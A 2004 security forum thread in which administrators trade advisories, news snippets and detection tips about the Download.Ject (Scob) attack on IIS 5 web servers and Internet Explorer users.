My local media was reporting a "Big" threat hitting the internet which involved infected Web Sites. So I hustle my butt into work to check things out. I have no high level alerts from Symantec only a note about a Category 1 virus which deals with Infected Web Sites.

Symantec Link (http://securityresponse.symantec.com/avcenter/venc/data/js.scob.trojan.html)

I head on over to the Internet Storm Center and they have more information:

A large number of web sites, some of them quite popular, were compromised earlier this week to distribute malicious code. The attacker uploaded a small file with javascript to infected web sites, and altered the web server configuration to append the script to all files served by the web server. The Storm Center and others are still investigating the method used to compromise the servers. Several server administrators reported that they were fully patched.

Source (http://isc.sans.org/)

I check all my systems and I see nothing going on which could be related to any of this.

My question, are any of you seeing anything from this "Big Threat" or is this just another issue which is being over hyped by the media?

Cheers:

More information from SANS:

The visitor's browser is re-directed to the Russian URL listed below where a known Trojan program (msits.exe) is downloaded, along with some additional malware. Again, if the user's machine is updated with current AV software, this malware is detected and blocked.

The earliest reported infection was on June 20th.

An IIS server's configuration is somehow modified so that "enable document footer" is enabled for various (if not all) files and linked to the new .dll file(s) in \winnt\system32\inetsrv. This might be done with the help of a program called agent.exe installed via one of the multiple known IIS vulnerabilities.

What we DON'T know, and can use some help in figuring out, is how the malware is installed on the IIS server to begin with. Is there a zero-day floating around? Is it via a known vulnerability and the use of agent.exe as mentioned above? (Ed Skodis, one of our handlers, suggested that perhaps the IIS system admin used a local copy of IE to browse a site and pulled down hostile JavaScript.

Anyone have more information on the following article? Is this new?

http://www.cnn.com/2004/TECH/internet/06/24/internet.attack.ap/index.html

Snippet
------------
CHICAGO, Illinois (AP) -- Government and industry experts warned late Thursday of a mysterious, large-scale Internet attack against thousands of popular Web sites. The virus-like infection tries to implant hacker software onto the computers of all Web site visitors.

Industry experts and the Homeland Security Department were studying the infection to determine how it spreads across Web sites and find adequate defenses against it.

"Users should be aware that any Web site, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code," the government warned in one Internet alert.

The mysterious infection appeared to target at least one recent version of software by Microsoft Corp. to operate Web sites, called its Internet Information Server, popular among businesses and organizations.
------------

Just looking for more info, detection methods, or general information.

i personaly think it is a big deal please keep us posted
so far it looks like a bunch of big corporate web sites got hit including one of citibank servers right now no one knows how.
they were all "patched" but these servers are dumping trogin's on visiting computers
right now info is NOT CERTAIN!!!!! i hate posting early but this is one 2 watch.
keep us posted
jeremy

As far as detection, the virus apparently appends some Javascript to the bottom of pages delivered by IIS 5.0.

http://www.uscert.gov/current/current_activity.html#iis5

Snippet
--------------------
IIS 5 Web Server Compromises
added June 24
US-CERT is aware of new activity affecting compromised web sites running Microsoft's Internet Information Server (IIS) 5 and possibly end-user systems that visit these sites. Compromised sites are appending JavaScript to the bottom of web pages. When executed, this JavaScript attempts to access a file hosted on another server. This file may contain malicious code that can affect the end-user's system. US-CERT is investigating the origin of the IIS 5 compromises and the impact of the code that is downloaded to end-user systems.

Web server administrators running IIS 5 should verify that there is no unusual JavaScript appended to the bottom of pages delivered by their web server.

This activity is another example of why end users must exercise caution when JavaScript is enabled in their web browser. Disabling JavaScript will prevent this activity from affecting an end-user's system, but may also degrade the appearance and functionality of some web sites that rely upon JavaScript. US-CERT recommends that end-users disable JavaScript unless it is absolutely necessary. Users should be aware that any web site, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code.

--------------------

This seems to be on the front page in three or four threads.

I posted information in this thread (http://www.antionline.com/showthread.php?s=&threadid=259139). The Russian web site is now offline though that will change soon probably.

Thanks Tiger, but for once, I am ahead of you on that. The address is blocked & my snort rules are updating as we speak. Are you seeing much activity?

I also sent a note to the Mod's to see if they wanted to merge these threads.

Cheers:

DJM:

Yep, I'm blocked and snorting..... Not seen anything yet, (1.5 hours).

The problem with blocking it is that it's down anyway. How long do you think it will be before they re-enter the compromised web sites and change to a new address?

Snort is the protection. One guy on the snort-sigs list turned it off because of all the false positives but no-one else seems to be seeing them so the rule should be good.

I've checked my web sites too..... No .js except for those we put there.... :cool: but I'm keeping my eye on the sites. Hopefully the HIDS will alert me to any changes.

Threats/threads merged. Thanks for reporting, DjM.

looks to me geocities. yahoo got hit

I don't know about Geocitoes but Yahoo doesn't seem to have it. Most of the home pages in my network are set for Yahoo and I haven't seen a single outbound request for the IP address of the Russian web site.

What do you ground your statement on?

Additionally, Cluley says that there has been some evidence that Web sites have been able to avoid the threat because they downloaded a patch made available by Microsoft in April to thwart the Sasser worm.

Could that be why nowbody is seeing much activity.

http://story.news.yahoo.com/news?tmpl=story&cid=1093&e=15&u=/pcworld/20040625/tc_pcworld/116690

Geez,

Lots of noise about this.. but very little tech info..

Can some one Correct me please.. On the Client side of things, this would make ANY Java enabled Browser on the Win32 platform Vulnerable? or is it just IE...

too bloody early on a (Working) Saturday Morning..

Cheers

I think the media is hyping this one a BIT. From all that I've read on NTBugTraq, Internet Storm Center, and others the only servers vulnerable are the ones NOT patched with the MS04-011 from April. If's that the case than I would hope we aren't hearing much because we have many smart administrators who have applied the April patch...at least I'm hoping that's the case. If not...shame shame shame.

Originally posted here (http://www.AntiOnline.com/showthread.php?threadid=259140#post762753) by Und3ertak3r
Can some one Correct me please.. On the Client side of things, this would make ANY Java enabled Browser on the Win32 platform Vulnerable? or is it just IE...

It looks like on Internet Explorer with Javascript enabled is vulnerable...only a few of those huh? (snicker). I actually tested it out on our test hardware while the site was still up found it calls a script which tried to pull up a .CHM file from the Windows directory with some parameter set - it wasn't successfull. I then scanned the PC and found 2 HTM files detected with some sort of Javascript code/trojan. Sorry I dont have the information handy here to give exact details.

The REAL bad thing I read is that it infects the client PC via some UNPATCHED IE holes! ...anyone betting on new MS IE patch soon?

This is a rather interesting _new_ (maybe not but recently new) way to infect PCs:
1) Infect a web server stealthily without alerting administrator
2) Change web server settings to have it attach malicious code on every page
3) Have infected client pull up malicious code, in background via hidden IE frame or windows so user doesnt notice, and run it and getting infected with other bad stuff (backdoors, keyloggers, name that malware!)

And all my users and I want to do is surf the web safely....ha :mad:

On its Web site, Microsoft said users could search for the files "Kk32.dll" or "Surf.dat" to see if their PCs were infected.

The Macintosh version of Internet Explorer is not affected, nor are non-Microsoft browsers such as Mozilla, Opera and Apple Computer Inc.'s Safari browser, security experts said

Read it here. (http://www.reuters.com/newsArticle.jhtml?type=internetNews&storyID=5519888)

/me walks away muttering "IE bad...Mozilla good.....IE bad....Opera good....IE bad...."

People forget that IE is directly tied to the Windows shell (not that folks in Redmond have always admitted it....). I can see the appeal of IE, but am glad I don't have to sweat stuff like this out with those who actually use it.

-- bumblehead

Sorry looks to me like we were had.
I am not the usually the boy who cry’s wolf and would like to offer my apology
The threat of zero day is real and it looked to me from what I was reading yesterday it had happened
It now appears that either the “high profile sites” that were hit were bogus or never happened.
Because
I can’t confirm one site and doesn’t it have to run iis?

Forgive my conspiracy theories but aren’t they trying to pass an anti ad ware law right now?
I hope I am wrong but I’m not holding my breath for that high profile list.
Please don’t be to mad at me people I didn’t start it.
Didn’t have to encourage it though until I was absolutely sure. Lesson learned.
jeremy

Sorry looks to me like we were had.
I am not the usually the boy who cry’s wolf and would like to offer my apology
The threat of zero day is real and it looked to me from what I was reading yesterday it had happened

Jeremy, no need to apologize. Computer security is all about knowing there is a threat out there no matter how it occurs and with the information available, (often limited), determining a technique to mitigate it in your own environment. You were far from alone in questioning the existence of another zero day. I, for one, (and I'm sure many here would concur), would rather have you "cry wolf" ten times than not to report a viable threat once. If nothing else you will make us look for evidence that corroborates your warning ourselves.

The media has done its job..

Had a pile of machines come in today complaining that they had been hit by this virus..

hmm
Comet Curser
]CoolWebSearch
Netsky
nachi
PronDialers
gaobot


yep they had a virus.. And I removed them.. but none were the one in question..

what happened to the bleeding edge of virii

off to ponder other problems..

cheers

The Internet Storm Center (http://isc.sans.org/) has just posted this information:

We have received information about compromised systems with Internet Information Server. These systems had an administrator level account with the username 'IWAP_WWW' added.

Please check if your server has such an account and let us know what you find. Until we know more, we suggest that you consider a server compromised if you find and administrator account with this username.


Those of you running an IIS Web server may want to have a look. ;)

Cheers:

I posted this in one of the other threads that were started on this "virus"... It would seem that it is not a self propogating virus, and if you are patched with all of the current patches, you should not have a problem.


On June 24 2004 Microsoft began investigating a report that some
customers using IIS 5.0 (Internet Information Services), a component of
Windows 2000 Server, are being exploited by an issue known as
Download.Ject. More information is available at
http://www.microsoft.com/downloadject.

The Microsoft investigation is active with security response teams
dedicated to analyzing, resolving and communicating progress to
customers in a timely manner. It is important to note that thus far in
the investigation, through alerting customers and partners worldwide,
Microsoft has been not been made aware of significant customer impact
based on Download.Ject.

Microsoft has confirmed that this attack is not self-propagating
malicious code. In other words, this is not a worm but a targeted
manual attack by individuals or entities towards a specific server.

To get the latest information please refer to
http://www.microsoft.com/downloadject

This just showed up in my email---

"Microsoft has released a configuration change that addresses the recent
malicious attack against Internet Explorer known as Download.Ject.

In addition, Microsoft has released a Knowledge Base article, 870669,
that provides information that administrators can use to implement this
change manually in their environment and to deploy the change across
their networks. This Knowledge Base article is available here:

http://support.microsoft.com/default.aspx?kbid=870669

Customers are advised to review the information in the Knowledge Base
article, test and deploy the change immediately in their environments,
if applicable.

If you have any questions regarding this alert please contact your
Technical Account Manager or Application Development Consultant."